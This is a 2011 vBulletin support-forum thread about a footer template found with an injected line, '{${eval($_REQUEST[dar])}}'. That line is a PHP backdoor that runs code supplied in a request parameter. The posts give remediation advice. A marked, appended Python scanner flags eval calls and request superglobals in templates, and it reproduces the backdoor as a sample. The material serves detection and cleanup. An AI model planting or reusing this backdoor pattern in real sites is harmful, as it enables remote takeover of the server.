#1 | 14 Mar 2011, 00:31 | Amenadiel (Join Date: Sep 2006)
hacking attempt? Modified template

My footer templates just got a new line:

<script type=\"text/javascript\">
<!-- // Main vBulletin Javascript Initialization
vBulletin_init();
{${eval($_REQUEST[dar])}}
//-->
</script>

I know I didn't insert that line in red. I haven't seen how this is exploited, and I can't explain how they inserted this line in my templates.

#2 | 14 Mar 2011, 12:53 | BirdOPrey5 (Join Date: Jun 2008, Real name: Joe D.)
Well, change your passwords (all admin accounts and your MySQL password)...

Run the suspect files check to see if any files have been altered...

How many mods do you have, could be an exploit in a mod?

Are you running at least 3.8.5?

Check out this article for securing your forums:
http://www.vbulletin.org/forum/showthread.php?t=193930

You could ask your host to check the logs to see if they can see how you were hacked - some hosts are more cooperative than others.
__________________
-Joe
Former vBulletin.org Staff Member

(@BirdOPrey5) Former vb.org Moderator. Fighting for a free & independent vb.org.
BirdOPrey5.com - Exclusive VB Mods! (Formerly Qapla.com) | Joe's Ultimate Off Topic
Note - I do not read my PMs often, do not expect quick replies.

#3 | 14 Mar 2011, 17:49 | Amenadiel (Join Date: Sep 2006)
Yep, I'm onto that, I just can't understand what's done with the "extra code".

Is it even possible to get REQUEST vars from a template? I believe it isn't, you must pass through a plugin to do that.

#4 | 14 Mar 2011, 17:56 | BirdOPrey5 (Join Date: Jun 2008, Real name: Joe D.)
I'm not really sure about $_REQUEST but if it's a valid PHP variable I don't see why it wouldn't work... I use $_SERVER['HTTP_HOST'] all the time in templates.
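
An added example, not part of any post in this thread: a Python check that flags template text containing PHP expression interpolation, code-execution calls or request superglobals, the three constructs in the injected footer line, and reports `$_SERVER` only as informational since it is used legitimately in templates. It assumes templates have been exported to a title-to-text mapping; the rule names, severities, and the header and navbar samples are constructed for illustration.

```python
import re

# (severity, rule name, pattern). Names and severities are this example's own
# choices; hits are leads for manual review, not proof of compromise.
RULES = [
    ("high", "php-expression-interpolation", re.compile(r"\{\s*\$\s*\{")),
    ("high", "code-execution-call", re.compile(
        r"\b(eval|assert|system|passthru|shell_exec|exec|create_function)\s*\(", re.I)),
    ("high", "request-superglobal", re.compile(r"\$_(REQUEST|GET|POST|COOKIE|FILES)\b")),
    ("info", "server-superglobal", re.compile(r"\$_SERVER\b")),
]

def scan_template(title, text):
    """Return one finding per (line, rule) match in a single template."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for severity, rule, pattern in RULES:
            if pattern.search(line):
                findings.append({"template": title, "line": lineno,
                                 "severity": severity, "rule": rule,
                                 "text": line.strip()})
    return findings

def scan_all(templates):
    """Scan a {title: text} mapping; high-severity findings sort first."""
    order = {"high": 0, "info": 1}
    results = [f for title, text in templates.items()
               for f in scan_template(title, text)]
    return sorted(results, key=lambda f: (order[f["severity"]], f["template"], f["line"]))

# Constructed sample: "footer" is the snippet from post #1; the others are invented.
SAMPLE_TEMPLATES = {
    "footer": (
        '<script type=\\"text/javascript\\">\n'
        '<!-- // Main vBulletin Javascript Initialization\n'
        'vBulletin_init();\n'
        '{${eval($_REQUEST[dar])}}\n'
        '//-->\n'
        '</script>\n'
    ),
    "header": '<a href=\\"http://$_SERVER[HTTP_HOST]/\\">Home</a>\n',
    "navbar": '<div class=\\"navbar\\">$vbphrase[home]</div>\n',
}

if __name__ == "__main__":
    for f in scan_all(SAMPLE_TEMPLATES):
        print(f'{f["severity"]:<5} {f["template"]}:{f["line"]} {f["rule"]}  {f["text"]}')
```
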